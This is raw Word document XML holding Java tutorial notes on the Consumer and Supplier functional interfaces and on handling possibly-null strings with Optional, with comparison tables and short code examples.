    <w:p w14:paraId="7801CCD2" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A0D9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66223E">
          <v:rect id="_x0000_i1754" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B93BD"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Comparis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4"/>
        <w:gridCol w:w="3133"/>
        <w:gridCol w:w="4034"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="15A18BF9" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FFB8D0" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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7161E6D7" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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sumer&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E1B9CB" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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pplier&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="7101CAA2" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71838028"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put</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CD88148"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akes input of type T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E47FA5"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akes no input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="5B0D3A86" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CC7A60E"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utput</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423A5502"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s nothing (void)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52DBF32F"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s a value of type T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="31845BB1" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="258B0877"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ethod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D07247"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oid accept(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BCFEB6"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 get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="777DDD29" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBE6B65"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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D2AD037"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erforming operations like logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E82B59A"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enerating or supplying values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="50AAABA6" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="329A76CA"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eam Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ACBF7D3"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Each()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEF4EB1"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to provide values to collections or APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E87E6DB" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A0D9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23C6F27">
          <v:rect id="_x0000_i1755" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB03A71" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9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eal-World Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF0DEA"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Using Consumer to print list elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DEADA7" w14:textId="77777777" w:rsidR="006F52FB" w:rsidRPr="00CE4B95" w:rsidRDefault="006F52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244041"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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name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li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Bo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Charlie"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CDBE14" w14:textId="6A18FBCA" w:rsidR="006F52FB" w:rsidRPr="00CE4B95" w:rsidRDefault="006F52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244041"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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orEac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ame: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r w:rsidR="00716FC8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="00716FC8"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onsumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93A91F" w14:textId="11B78E67" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECC055F"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Using Supplier to generate random numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F3626" w14:textId="77777777" w:rsidR="006F52FB" w:rsidRPr="00CE4B95" w:rsidRDefault="006F52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0214463"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Supplier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> randomSupplier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g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Math</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random</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11FFBB" w14:textId="38864473" w:rsidR="006F52FB" w:rsidRPr="00CE4B95" w:rsidRDefault="006F52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0214463"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>System</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ou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println</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Random: "</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randomSupplier</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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074CFAC7" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A0D9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38101B7">
          <v:rect id="_x0000_i1756" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D6029"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8"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="550"/>
        <w:gridCol w:w="716"/>
        <w:gridCol w:w="2486"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="0E8DBBC9" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609EE3C1" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A943B4E" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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ignature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B3F129" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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put</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193772DC" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3E27E7" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="008A5F3A">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mon Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="1E6EED94" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E69D307"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sumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CD1988B"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ccept(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FD60701"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10D78A9B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37ED1C99"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int, update, store, log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="513A01BE" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209D11FF"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pplier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C82533"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et()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D47ECE5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B57DF16"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55163D49" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9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pply value, create object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14018D38" w14:textId="2DF49DCE" w:rsidR="00912200" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0091220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2DB3107">
          <v:rect id="_x0000_i1757" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5FF7A" w14:textId="77777777" w:rsidR="005C5D19" w:rsidRPr="00CE4B95" w:rsidRDefault="005C5D19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="_Toc196307722"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Optional case returning null and String, how to handle it? What are the advantages of using it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w14:paraId="0D03D689" w14:textId="3FA08444" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Problem Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749FC2A"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You have a method that might return a String or null, and you want to handle it cleanly using Optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BD284" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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58F3651">
          <v:rect id="_x0000_i1758" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A7E414" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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ithout Optional (Prone to NullPointerException):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E589BE"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1F385"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null; // or return "Siddhant";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4829AE"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E73D56C" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCF6893"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 name = getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBAF29"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ystem.out.println(name.toUpperCase()); // </w:t>
      </w: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May throw NPE if name is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB96FB" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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2238FCE">
          <v:rect id="_x0000_i1759" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBE1EA" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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ith Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6B9D4"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Optional&lt;String&gt; getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33E28B"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Optional.ofNullable(null); // or Optional.of("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5486B0E2"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E3CA564" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A1DEA0"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Handling safely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E645D0"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 name = getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811246B"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String::toUpperCase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEC6E9"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rElse("DEFAULT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011884D"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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6B988" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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9509C2A">
          <v:rect id="_x0000_i1760" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16285BCB" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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Handling Optional - Different Ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255635DE"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ptional&lt;String&gt; optionalStr = Optional.ofNullable(getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D452F" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50341D7A"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1. Check presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B9F78"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optionalStr.isPresent()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2801A9BE"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optionalStr.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9AE45"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3FF7B83" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B322064"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2. Use orElse / orElseGet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1160F7"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 value = optionalStr.orElse("Default Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC1A5E4"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 value2 = optionalStr.orElseGet(() -&gt; "Generated Default");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26060494" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEA790E"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3. Use map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132FF60"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ing result = optionalStr.map(String::toUpperCase).orElse("DEFAULT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7BF84A" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF116CF"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4. Use ifPresent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04DA91"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ptionalStr.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41BE93" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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483D84A">
          <v:rect id="_x0000_i1761" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
